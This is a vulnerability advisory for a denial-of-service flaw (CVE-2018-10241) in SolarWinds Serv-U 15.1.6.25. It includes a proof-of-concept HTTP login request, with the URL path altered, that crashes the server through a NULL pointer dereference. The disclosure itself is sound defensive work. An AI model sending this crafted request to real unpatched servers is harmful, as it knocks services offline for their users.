SolarWinds Serv-U Managed File Transfer – Denial of Service

By Baker Hamilton

 

Title

SolarWinds Serv-U Managed File Transfer - Denial of Service 

Release Date

May 3, 2018 

Reported Date

January 8, 2018 

Vendor

SolarWinds

Systems Affected

Serv-U 15.1.6.25

Summary

A denial-of-service vulnerability in SolarWinds Serv-U 15.1.6.25 allows an authenticated user to crash the application (with a NULL pointer dereference) via a specially crafted URL beginning with the /Web%20Client/ substring.

Vendor Status

The vendor has been notified of this vulnerability, and has patched the software as of version 15.1.6 HFv1.

Exploit Availability

An authenticated user can request a specially crafted URL from the Serv-U MFT server that will result in a null pointer dereference. By changing the Login.xml string in the URL of an authentication request to an arbitrary value, an attacker can cause the application to crash. An ordinary login request is shown below:

POST /Web%20Client/Login.xml?Command=Login&Sync=1514397954014 HTTP/1.1
Host: 127.0.0.1
Connection: close
…omitted for brevity…
Cookie: multitransbubbletip=false; multitrans=0; SURememberMe=true; SUUserId=testuser2; killmenothing; SULang=en%2CUS

user=testuser&pword=password&viewshare=&language=en%2CUS&

In this proof of concept, Login.xml was replaced with the string crash, as pictured below:

POST /Web%20Client/crash?Command=Login&Sync=1514397954014 HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Length: 59
…omitted for brevity…
Cookie: multitransbubbletip=false; multitrans=0; SURememberMe=true; SUUserId=testuser2; killmenothing; SULang=en%2CUS

user=testuser&pword=password&viewshare=&language=en%2CUS&

The Serv-U tray immediately displayed a pop-up notification stating that the Serv-U MFT server was offline. Shortly thereafter, an error message was displayed within the Serv-U Management Console, as seen below:

 

Advisory for SolarWinds vulnerability discovered by Baker Hamilton of Bishop Fox. Vendor has since remediated.. FIGURE 1 - Error produced in Serv-U Management Console after sending the malicious payload

 

The Management Console was otherwise unresponsive, and the Serv-U MFT server had to be manually restarted following this crash.

Researcher

Baker Hamilton, MD, MMSc of Bishop Fox 

For Reference

CVE-2018-10241

National Vulnerability Database Write-Up